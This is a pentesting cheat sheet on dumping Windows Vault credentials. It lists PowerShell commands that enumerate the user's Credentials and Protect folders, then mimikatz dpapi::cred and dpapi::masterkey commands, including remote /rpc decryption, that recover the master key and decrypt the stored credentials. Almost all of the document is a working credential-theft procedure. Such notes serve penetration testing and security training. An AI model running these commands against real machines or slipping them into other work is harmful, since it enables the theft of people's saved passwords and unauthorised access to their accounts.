Dumping Credentials from Windows Vault
Last modified: 2023-03-26
Privilege Escalation
Windows
We may be able to retrieve credentials if Windows Vault credentials are stored some folders.
1. Enumerate Credentials
# Under %APPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
# Under %LOCALAPPDATA% folder
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Credentials\
2. Dump Credential Information
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\123ABC...
# or
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC...
We can retrieve the guidMasterKey value that is used for the next section.
3. Decrypt MasterKey
The DPAPI keys are stored under %APPDATA%\Microsofr\Protect\ or %LOCALAPPDATA%\Microsoft\Protect\ folder. These keys are used for encrypting
# Under %APPDATA%
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\
# Under %LOCALAPPDATA%
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\
dir C:\Users\<user>\AppData\Local\Microsoft\Protect\
Get-ChildItem C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
Get-ChildItem -Hidden C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
dir C:\Users\<user>\AppData\Local\Microsoft\Protect\{SID}\
Now decrypt the master keys:
# /rpc: Remotely decrypt the MasterKey
mimikatz # dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\{SID}\{STRING} /rpc
We can get the key value that is the decrypted Master Key.
4. Dump Credentials
We can dump credentials using the collected Credential value and decrypted Master Key (domainkey).
# Specify '/<guidMasterKey>::<masterkey>'
mimikatz # dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\123ABC... /01234567-890abcde...::abcdef...